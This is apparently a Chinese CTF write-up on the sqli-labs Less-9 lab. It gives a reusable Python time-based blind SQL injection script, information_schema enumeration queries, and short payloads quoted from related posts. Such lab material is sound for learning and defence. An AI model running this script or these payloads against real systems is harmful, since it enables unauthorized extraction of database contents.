[sql注入]时间盲注模板+sqli靶场less-9

最新推荐文章于 2024-05-19 13:42:54 发布
最新推荐文章于 2024-05-19 13:42:54 发布
阅读量445 收藏
点赞数
分类专栏: sql注入 ctf python 文章标签: sql less 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37301470/article/details/121303614
版权
ctf 同时被 3 个专栏收录
42 篇文章 2 订阅
订阅专栏
sql注入
14 篇文章 0 订阅
订阅专栏
python
6 篇文章 0 订阅
订阅专栏

less-9

观察页面只有一个返回值You are in…
即使值为错也没有返回
因此采用时间盲注

import requests
import string
import time
ip="http://a86ecc66-5929-4b0d-b39c-842de53f0121.node4.buuoj.cn/Less-9/?id="
command="database()"
result=""
for i in range(1,100):
    for j in string.ascii_letters:
        sql=f"1' and if(ord(substr(({command}),{i},1))=ord('{j}'),sleep(3),4) %23"
        print(ip+sql)
        now=time.time()
        requests.get(url=ip+sql)
        after=time.time()
        gap=after-now
        if gap <3:
            pass
        elif gap>=3:
            result+=j
            print(f"result:{result}")
        if ord(f'{j}')==127:
            exit(0)

select table_name from information_schema.tables where table_schema='security' limit 0,1
select column_name from information_schema.columns where table_schema='security' limit 0,1
select id from table_name
捞氘河水怪
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入——sqli-labs-Less-9时间盲注_sqliless9,解析底层原理
2401_84433486的博客
04-17 777
测得第一列的名称的第一个字符是“i”,同样类推,得到第一列名为“id”,第二列“username”第三列“password”然后,第二个表名的第一位是“r”,依此类推得到第二个表名“referers”,第三个“uagens”,第四个“users”手注是可以注出来,但是相当费时间,我认为,手注更大的意义在于理解方法。(img-qkVA1lLi-1713365620107)]测得第一个表名的第一位是“e”,递推下去得到表名:emails。止,不再深入研究,那么很难做到真正的技术提升。下面尝试注users表。
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1598
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间盲注(Time-based blind)
sqli-labs靶场时间盲注
最新发布
2302_78903258的博客
05-19 614
这里可以解释为当我们进行数据库名的长度判断时,如果条件成立,sleep函数延迟3秒后回显界面,如果条件不成立,就输出0 -----提示一下,如果大家网络有延迟的话,将sleep()函数里面的值设置为大一点,5啊10啊都ok的。这里的判断语句跟布尔盲注基本是一样的,所以大家不懂得话可以先学一下布尔盲注,这里获得的是库名的第一个字符,其他字符只需要更改substr()函数的值就ok了-------可以的到数据库名为security。获得数据---------这里同样也有两种用法。
sqli-labs (less-9)
kukudeshuo的博客
03-08 1377
sqli-labs (less-9) 补充知识 本关将介绍与Boolean盲注非常相似的另一种注入方法——时间盲注。他与Boolean盲注的不同之处在于,时间注入是利用sleep()或benchmark()等函数让MySQL的执行时间变长。时间盲注多与IF(expr1,expr2,expr3)结合使用,此if语句含义是:如果expr1是TRUE,则IF()的返回值为expr2;否则返回值则为expr3。 例: if (length(database())>1,1,sleep(5)),这句语句的意思是查
sqli靶场通关之less9
sunxueer的博客
07-19 1228
sqli less9 时间盲注 结合burpsuite 1.不返回报错信息页面,无法进行基于报错信息的盲注。2.页面不存在true和false两种不同的页面,无法进行对比也就无法进行布尔盲注。一般来说,在页面没有任何回显和错误信息提示的时候,我们就会测试时间盲注这个手法。 1. 求闭合字符 id=1',1),1'),1"等都试过了,发现始终没有报错信息,猜测正确的输入和错误的输入返回的结果被设置成一样的了 查看源码,证实了猜测,尝试使用时间盲注 id=1 and sleep(5) //未延迟 i
php sql注入
技术的搬运工
01-16 2265
在应用程序中,为了和用户交互,允许用户提交输入数据,假如应用程序并没有对用户输入数据进行处理,攻击者可以输入一些跟sql语句相关的字符串(一般带有特殊字符)从而让应用程序执行危险的 SQL 操作,导致泄漏机密数据(比如用户信息)或直接修改删除线上的数据。
phpstudy+靶场sqli-labs-master下载
11-08
5. **SQL注入原理**:理解SQL注入的形成原因,如不安全的SQL拼接、未过滤用户输入等,并了解不同类型的SQL注入攻击,如基于错误的注入、基于时间盲注等。 6. **Sqli-Labs实战**:熟悉靶场的结构,逐级破解每个...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
PHP、Apache环境中部署sqli-labs(SQL注入靶场
01-08
PHP、Apache 环境中部署 sqli-labs(SQL 注入靶场) 知识点 1: sqli-labs 介绍 sqli-labs 是一款开源的练习 SQL 注入的靶场工具,用 PHP 代码编写而成。它需要 PHP 和 Apache 环境运行。sqli-labs 提供了一个实践 ...
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
【网络安全-实验七-SQL注入-盲注+sqlmap使用】 SQL注入是一种常见的网络攻击方式,它通过在应用程序的输入参数中嵌入恶意SQL代码,从而控制或篡改数据库的行为。在这个实验中,我们将深入理解SQL注入盲注类型,并...
sql-injection-demo:尝试SQL注入的准系统模板
05-16
SQL注入示例代码 重要说明:请勿将此代码放在其他人可以访问的服务器上。 要启动并运行: 在MySQL中创建数据库,并在bad-inj-show.php编辑以下bad-inj-show.php行以进行匹配: $ dsn = 'mysql:dbname=my_dbname;host=127.0.0.1' ; $ user = 'my_user' ; $ password = 'my_password' ; 使用以下命令从db_dump.sql文件插入my_users表: $ mysql -u my_user -pmy_password my_db_name < db_dump.sql 使用或类的代码在本地托管代码。 导航到浏览器中的bad-inj.php页面,然后处理表单。 以下是一些可尝试输入的示例: ed@example.com a" OR 1 = 1 -- a"
SQL注入学习——时间盲注详解 sqli-labs(Less 9)
未完成的歌~的博客
09-01 4283
Less-9 基于时间的双引号盲注
SQL注入基础样例1
qq_49283465的博客
05-02 415
其次我们尝试通过字符转义、传入大数id=50000000等各种方式来使其报错—此处表示你已经过了waf(即使你不会),我们观察他的闭合方式,诱导语句闭合并使用- -+把后面语句注释掉。小知识:我们要知道SQL语句的闭合方式:无符号闭合、单引号—‘’、双引号—“”、单引号与括号联动—‘)、双引号与括号联动—“)、单引号括号双引号—‘)“、以及搜索语句中—‘%’闭合。攻击方式:报错注入、union联合注入、布尔盲注时间盲注、http头注入、宽字节注入(中国网站)、文件注入、DNS注入等。
SQL注入-bWAPP靶场-时间盲注
m0_62665450的博客
01-04 300
sql-时间盲注
SQL注入
热门推荐
m0_51457307的博客
11-08 2万+
一、什么是SQL注入 SQL注入SQL lnjection)是发生在Web程序中数据库层的安全漏洞,是比较常用的网络攻击方式之一,他不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至修改数据库。也就是说,SQL注入就是在用户输入的字符串中添加SQL语句,如果在设计不良的程序中忽略了检查,那么这些注入进去的SQL语句就会被数据库服务器误认为是正常的SQL语句而运行,攻击者就可以执行计划外的命令或者访问未授权的数据。 二、SQL注入的原理 1.恶意拼接查
时间盲注靶场作业
weixin_45540609的博客
04-17 171
题目1 无论输入什么,都会显示有数据 这里采用时间盲注,输入1" and sleep(10) -- qwe,有明显的延时,说明存在时间盲注 1" and if(length(database())>5,sleep(8),1) -- qwe 反复尝试看没有延时感觉的时候,得到数据库长度为12 1" and if(ascii(substr(database(),1,1)<128),sleep(8),1) -- qwe 用sqlmap跑出 1'andup...
SQL注入攻击的原理、分类和防御方法
Andrew的博客
02-27 2万+
一.SQL注入攻击原理 恶意用户在提交查询请求的过程中将SQL语句插入到请求内容中,同时程序本身对用户输入内容过分信任而未对恶意用户插入的SQL语句进行过滤,导致SQL语句直接被服务端执行。   二.SQL注入攻击分类 (1)注入点的不同分类 数字类型的注入 字符串类型的注入 (2)提交方式的不同分类 GET注入 POST注入 COOKIE注入 HTTP注入 (3)获取信息的方...
SQL注入——基于时间盲注sqli-labs less9)
yuan114012的博客
05-21 970
一.基于时间盲注 适用场景:没有数据回显,条件正确与否结果一样 利用方式:构造判断条件,添加sleep,逐个猜测(盲猜) 1.所需语法与函数 IF表达式 IF( expr1 , expr2 , expr3 ) #expr1 的值为 TRUE,则返回值为 expr2 #expr1 的值为FALSE,则返回值为 expr3 expr1 的值为 TRUE,则返回值为 expr2 expr1 的值为FALSE,则返回值为 expr3 mysql> select if(1=1,1,.
sqli-labs靶场练习笔记
11-09
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值